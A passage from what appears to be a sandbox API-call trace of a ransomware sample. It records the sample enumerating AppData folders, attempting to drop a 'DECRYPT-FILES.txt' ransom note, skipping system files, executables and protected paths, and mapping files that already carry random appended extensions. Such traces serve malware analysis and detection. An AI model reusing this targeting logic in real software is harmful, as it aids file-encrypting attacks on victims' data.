HALPmcxz\\AppData\\\\DECRYPT-FILES.txt") returned 56 [0179.739] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.739] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned 38 [0179.739] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*" [0179.739] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xee428f00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee428f00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0179.739] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.739] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xee428f00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee428f00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.739] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.739] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.739] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xee428f00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xee428f00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee428f00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0179.739] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0179.739] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0179.739] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0179.740] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0179.740] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0179.740] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0179.740] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0179.740] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0179.740] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0179.740] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0179.740] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.740] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0179.740] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0179.740] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0179.740] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0179.740] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned 38 [0179.740] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.740] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\" [0179.740] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\0a16c9.tmp" [0179.740] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.740] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.740] CloseHandle (hObject=0x0) returned 0 [0179.740] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.741] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9d5a6e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9d5a6e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9d5a6e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.741] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.741] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0179.741] lstrcmpW (lpString1="Local", lpString2=".") returned 1 [0179.741] lstrcmpW (lpString1="Local", lpString2="..") returned 1 [0179.741] lstrcatW (in: lpString1="Local", lpString2="\\" | out: lpString1="Local\\") returned="Local\\" [0179.741] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpString2="Local\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\" [0179.741] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpSrch="\\Program Files") returned 0x0 [0179.741] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpSrch=":\\Windows") returned 0x0 [0179.741] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpSrch="\\Games\\") returned 0x0 [0179.741] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.741] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.741] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.741] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.741] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.741] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpSrch="\\All Users") returned 0x0 [0179.741] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.741] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.741] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpSrch="\\AppData\\Local") returned="\\AppData\\Local\\" [0179.741] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0179.741] lstrcmpW (lpString1="LocalLow", lpString2=".") returned 1 [0179.741] lstrcmpW (lpString1="LocalLow", lpString2="..") returned 1 [0179.741] lstrcatW (in: lpString1="LocalLow", lpString2="\\" | out: lpString1="LocalLow\\") returned="LocalLow\\" [0179.741] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpString2="LocalLow\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\" [0179.741] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpSrch="\\Program Files") returned 0x0 [0179.741] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpSrch=":\\Windows") returned 0x0 [0179.741] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpSrch="\\Games\\") returned 0x0 [0179.741] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.741] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.741] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.741] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.741] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.742] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpSrch="\\All Users") returned 0x0 [0179.742] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.742] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.742] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpSrch="\\AppData\\Local") returned="\\AppData\\LocalLow\\" [0179.742] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xad75ff20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad75ff20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0179.742] lstrcmpW (lpString1="Roaming", lpString2=".") returned 1 [0179.742] lstrcmpW (lpString1="Roaming", lpString2="..") returned 1 [0179.742] lstrcatW (in: lpString1="Roaming", lpString2="\\" | out: lpString1="Roaming\\") returned="Roaming\\" [0179.742] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpString2="Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0179.742] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="\\Program Files") returned 0x0 [0179.742] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch=":\\Windows") returned 0x0 [0179.742] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="\\Games\\") returned 0x0 [0179.742] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.742] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.742] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.742] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.742] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.742] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="\\All Users") returned 0x0 [0179.742] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.742] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.742] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.742] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="AhnLab") returned 0x0 [0179.742] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.742] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0179.742] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.742] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\\\0a16c9.tmp") returned 57 [0179.742] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0179.744] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0179.744] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.744] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\\\DECRYPT-FILES.txt") returned 64 [0179.744] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.745] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0179.745] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*" [0179.745] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xee428f00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee428f00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0179.745] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.745] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xee428f00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee428f00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.745] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.746] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.746] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xee428f00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xee428f00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee428f00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0179.746] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0179.746] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0179.746] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0179.746] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0179.746] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0179.746] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0179.746] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0179.746] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0179.746] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0179.746] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0179.746] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.746] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0179.746] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0179.746] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0179.746] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0179.746] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0179.746] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.746] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0179.746] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0a16c9.tmp" [0179.746] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.746] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.746] CloseHandle (hObject=0x0) returned 0 [0179.747] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.747] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1ea0430, ftCreationTime.dwHighDateTime=0x1d4c79d, ftLastAccessTime.dwLowDateTime=0xb9df9be0, ftLastAccessTime.dwHighDateTime=0x1d4d354, ftLastWriteTime.dwLowDateTime=0xa9d80840, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x5896, dwReserved0=0x0, dwReserved1=0x0, cFileName="1ek gB-.png.MBO3vR", cAlternateFileName="1EKGB-~1.MBO")) returned 1 [0179.747] lstrcmpiW (lpString1="1ek gB-.png.MBO3vR", lpString2="DECRYPT-FILES.txt") returned -1 [0179.747] lstrcmpiW (lpString1="1ek gB-.png.MBO3vR", lpString2="autorun.inf") returned -1 [0179.747] lstrcmpiW (lpString1="1ek gB-.png.MBO3vR", lpString2="boot.ini") returned -1 [0179.747] lstrcmpiW (lpString1="1ek gB-.png.MBO3vR", lpString2="desktop.ini") returned -1 [0179.747] lstrcmpiW (lpString1="1ek gB-.png.MBO3vR", lpString2="ntuser.dat") returned -1 [0179.747] lstrcmpiW (lpString1="1ek gB-.png.MBO3vR", lpString2="iconcache.db") returned -1 [0179.747] lstrcmpiW (lpString1="1ek gB-.png.MBO3vR", lpString2="bootsect.bak") returned -1 [0179.747] lstrcmpiW (lpString1="1ek gB-.png.MBO3vR", lpString2="ntuser.dat.log") returned -1 [0179.747] lstrcmpiW (lpString1="1ek gB-.png.MBO3vR", lpString2="thumbs.db") returned -1 [0179.747] lstrcmpiW (lpString1="1ek gB-.png.MBO3vR", lpString2="Bootfont.bin") returned -1 [0179.747] lstrlenW (lpString="1ek gB-.png.MBO3vR") returned 18 [0179.747] lstrcmpiW (lpString1="MBO3vR", lpString2="lnk") returned 1 [0179.747] lstrcmpiW (lpString1="MBO3vR", lpString2="exe") returned 1 [0179.747] lstrcmpiW (lpString1="MBO3vR", lpString2="sys") returned -1 [0179.747] lstrcmpiW (lpString1="MBO3vR", lpString2="dll") returned 1 [0179.747] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0179.747] lstrlenW (lpString="1ek gB-.png.MBO3vR") returned 18 [0179.747] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0179.747] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="1ek gB-.png.MBO3vR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1ek gB-.png.MBO3vR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1ek gB-.png.MBO3vR" [0179.747] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.747] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1ek gB-.png.MBO3vR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\1ek gb-.png.mbo3vr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0179.748] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=22678) returned 1 [0179.748] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0179.748] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0179.750] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0179.750] CloseHandle (hObject=0x268) returned 1 [0179.750] CloseHandle (hObject=0x264) returned 1 [0179.750] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.750] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd598d800, ftCreationTime.dwHighDateTime=0x1d4cc2f, ftLastAccessTime.dwLowDateTime=0xd0e5fb00, ftLastAccessTime.dwHighDateTime=0x1d4c8d1, ftLastWriteTime.dwLowDateTime=0xa9dccb00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x3c6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="1v9OFDiJWPm8MHHQ.odt.3uxU", cAlternateFileName="1V9OFD~1.3UX")) returned 1 [0179.750] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.odt.3uxU", lpString2="DECRYPT-FILES.txt") returned -1 [0179.750] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.odt.3uxU", lpString2="autorun.inf") returned -1 [0179.750] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.odt.3uxU", lpString2="boot.ini") returned -1 [0179.750] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.odt.3uxU", lpString2="desktop.ini") returned -1 [0179.750] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.odt.3uxU", lpString2="ntuser.dat") returned -1 [0179.750] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.odt.3uxU", lpString2="iconcache.db") returned -1 [0179.750] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.odt.3uxU", lpString2="bootsect.bak") returned -1 [0179.750] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.odt.3uxU", lpString2="ntuser.dat.log") returned -1 [0179.750] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.odt.3uxU", lpString2="thumbs.db") returned -1 [0179.750] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.odt.3uxU", lpString2="Bootfont.bin") returned -1 